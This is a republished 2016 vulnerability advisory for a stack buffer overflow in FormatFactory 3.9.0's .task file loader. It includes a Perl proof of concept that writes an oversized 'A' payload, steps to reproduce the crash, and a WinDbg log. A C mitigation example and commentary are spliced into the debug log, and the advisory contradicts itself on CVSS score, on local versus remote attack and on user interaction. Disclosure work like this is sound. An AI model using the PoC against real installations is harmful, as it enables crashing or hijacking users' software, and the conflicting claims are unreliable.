FormatFactory 3.9.0 .task Stack Overflow

Reported: 02 Sep 2016 00:00:00, by ZwX
Type: packetstorm
Source: packetstormsecurity.com

FormatFactory 3.9.0 - Stack Overflow Vulnerability in .task file

Code
`Document Title:  
===============  
FormatFactory 3.9.0 - (.task) Stack Overflow Vulnerability  
  
  
References (Source):  
====================  
http://www.vulnerability-lab.com/get_content.php?id=1935  
  
  
Release Date:  
=============  
2016-09-01  
  
  
Vulnerability Laboratory ID (VL-ID):  
====================================  
1935  
  
  
Common Vulnerability Scoring System:  
====================================  
6.1  
  
  
Product & Service Introduction:  
===============================  
FormatFactory is a file conversion program released as freeware by Free Time and available only on Windows. It can convert video files   
as well as audio and image files. It can also rip DVDs and CDs into other formats such as .iso image files, and it can convert .flv   
files, a feature that many video conversion programs do not support.  
  
(Copy of the Vendor Homepage: http://www.pcfreetime.com/)  
  
  
Abstract Advisory Information:  
==============================  
An independent vulnerability laboratory research (ZwX) discovered a local stack buffer overflow vulnerability in the FormatFactory v3.9.0 software.  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2016-09-01: Public Disclosure (Vulnerability Laboratory)  
  
  
Discovery Status:  
=================  
Published  
  
  
Affected Product(s):  
====================  
  
Exploitation Technique:  
=======================  
Local  
  
  
Severity Level:  
===============  
High  
  
  
Technical Details & Description:  
================================  
A local stack buffer overflow vulnerability has been discovered in the official FormatFactory v3.9.0 software.  
The overflow vulnerability allows remote attackers to take over the process by overwriting the active registers.  
  
A wrong validation check while loading a (.task) file results in a classic stack overflow that crashes the program.  
Remote attackers are then able to overwrite, for example, EIP in order to control the vulnerable software process.  
The file-loading routine in the software engine imposes no restriction on input size or memory use when processing   
local .task files queued for loading.  
  
The security risk of the issue is estimated as high with a CVSS (Common Vulnerability Scoring System) count of 6.0.   
Exploitation of the vulnerability requires a low-privileged or restricted system user account and no user interaction.   
Successful exploitation of the vulnerability results in manipulation and compromise of the computer system.  
  
Vulnerable File(s):  
[+] .task  
  
  
Proof of Concept (PoC):  
=======================  
A local buffer overflow vulnerability can be exploited by local attackers without user interaction and with a low-privileged system user account.  
For security demonstration or to reproduce the vulnerability, follow the information and steps provided below.  
  
  
Manual steps to reproduce the vulnerability ...  
1. Launch FormatFactory.exe  
2. Run the Perl code below; a .task file will be created  
3. Click Spot - Task Load File  
4. Click on Video and MP4  
5. Click the OK button  
6. The software crashes  
7. The local buffer overflow vulnerability has been successfully reproduced!  
  
  
PoC: Exploit Code (Perl)   
#!/usr/bin/perl  
# 5000 bytes of 0x41 ('A'); the WinDbg session below shows them on the stack  
my $Buff = "\x41" x 5000;  
# write the oversized payload as the .task file to be loaded  
open(MYFILE,'>>FormatFactory.task') or die "cannot open FormatFactory.task: $!";  
print MYFILE $Buff;  
close(MYFILE);  
print "PoC by ZwX\n";  
  
  
--- Debug Session Logs [WinDBG] ---  
Stack buffer overflow - code c0000409  
eax=00000001 ebx=00000001 ecx=00000005 edx=77ae13f0 esi=015a9a18 edi=00000111  
eip=548e46a9 esp=015a9198 ebp=015a91b0 iopl=0 nv up ei pl nz na po nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202  
*** ERROR: Symbol file could not be found.   
Defaulted to export symbols for C:\Program Files\FormatFactory\MSVCR120.dll - MSVCR120!invoke_watson+0xe:  
548e46a9 cd29 int 29h  
  
EXCEPTION_RECORD: ffffffff -- (.exr ffffffffffffffff)  
ExceptionAddress: 548e46a9 (MSVCR120!invoke_watson+0x0000000e)  
ExceptionCode: c0000409 (Stack buffer overflow)  
ExceptionFlags: 00000001  
NumberParameters: 1  
Parameter[0]: 00000005  
  
FAULTING_THREAD: 00000890  
BUGCHECK_STR: STACK_OVERRUN  
PROCESS_NAME: FormatFactory.exe  
FAULTING_MODULE: 77a50000 ntdll  
DEBUG_FLR_IMAGE_TIMESTAMP: 524f7ce6  
ERROR_CODE: (NTSTATUS) 0xc0000409 - Le système a détecté la saturation de la mémoire tampon dans cette application.   
Cette saturation pourrait permettre à un utilisateur mal intentionné de prendre le contrôle de cette application.  
DEFAULT_BUCKET_ID: WRONG_SYMBOLS  
LAST_CONTROL_TRANSFER: from 548e467c to 548e46a9  
  
ChildEBP RetAddr   
WARNING: Stack unwind information not available. Following frames may be wrong.  
015a91b0 548e467c MSVCR120!invoke_watson+0xe  
015a91d4 54873600 MSVCR120!invalid_parameter_noinfo+0xc  
015a91f0 00e802ee MSVCR120!swprintf_s+0x17  
015aa0b8 00410041 FormatFactory!boost::asio::io_service::service::fork_service+0x9a6e  
015aa0bc 00410041 0x410041  
015aa0c0 00410041 0x410041  
015aa0c4 00410041 0x410041  
015aa0c8 00410041 0x410041  
015aa0cc 00410041 0x410041  
015aa0d0 00410041 0x410041  
015aa0d4 00410041 0x410041  
015aa0d8 00410041 0x410041  
015aa0dc 00410041 0x410041  
015aa0e0 00410041 0x410041  
015aa0e4 00410041 0x410041  
015aa0e8 00410041 0x410041  
015aa0ec 00410041 0x410041  
015aa0f0 00410041 0x410041  
015aa0f4 00410041 0x410041  
015aa0f8 00410041 0x410041  
0:000> d esi  
015a9a18 00 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
015a9a28 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
015a9a38 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
015a9a48 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
015a9a58 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
015a9a68 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
015a9a78 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
015a9a88 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
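The frames above show swprintf_s handing off to invalid_parameter_noinfo and invoke_watson, i.e. the secure CRT rejecting a formatted string that does not fit its destination buffer, after the oversized .task content reached it unchecked. The following is an added example (not FormatFactory's code) of the bounded loader pattern that prevents this: it caps the payload size before any fixed buffer is involved and treats a too-long formatted result as an error instead of letting the CRT fault. MAX_TASK_BYTES, NAME_BUF and the "task:" prefix are constructed assumptions about the file's handling.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_TASK_BYTES 1024   /* constructed limit: largest accepted .task payload */
#define NAME_BUF 256          /* constructed size of the fixed destination buffer */

/* Bounded loader: returns 0 on success, -1 if the payload is rejected.
 * Rejects oversized input before formatting, then checks the formatted
 * length rather than relying on the CRT's invalid-parameter handler. */
int load_task(const unsigned char *data, size_t len, char *out, size_t outcap)
{
    if (data == NULL || out == NULL || outcap == 0)
        return -1;
    if (len > MAX_TASK_BYTES)            /* first gate: raw payload size */
        return -1;
    int n = snprintf(out, outcap, "task:%.*s", (int)len, (const char *)data);
    if (n < 0 || (size_t)n >= outcap) {  /* second gate: formatted length */
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Builds the advisory's PoC input in memory: `count` bytes of 0x41 ('A'),
 * constructed here so the example runs without a file on disk. */
int load_task_from_pattern(size_t count, char *out, size_t outcap)
{
    unsigned char *buf = malloc(count ? count : 1);
    if (buf == NULL)
        return -1;
    memset(buf, 0x41, count);
    int rc = load_task(buf, count, out, outcap);
    free(buf);
    return rc;
}

int main(void)
{
    char name[NAME_BUF];
    printf("5000 x 'A': %s\n",
           load_task_from_pattern(5000, name, sizeof name) == 0 ? "accepted" : "rejected");
    printf("16 x 'A': %s (%s)\n",
           load_task_from_pattern(16, name, sizeof name) == 0 ? "accepted" : "rejected", name);
    return 0;
}
```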
  
  
Security Risk:  
==============  
The security risk of the stack buffer overflow vulnerability in the software core of FormatFactory is estimated as high. (CVSS 6.1)  
  
  
Credits & Authors:  
==================  
ZwX - [http://www.vulnerability-lab.com/show.php?user=ZwX]  
  
  
Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed   
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable   
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab   
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for   
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,   
deface websites, hack into databases or trade with stolen data.  
  
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com  
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact  
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab  
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php  
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php  
  
Any modified copy or reproduction, including partial usage, of this file, resources or information requires authorization from Vulnerability Laboratory.   
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by   
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks   
of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material, contact (admin@) to ask for permission.  
  
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™  
  
  
  
--   
VULNERABILITY LABORATORY - RESEARCH TEAM  
SERVICE: www.vulnerability-lab.com  
  
`
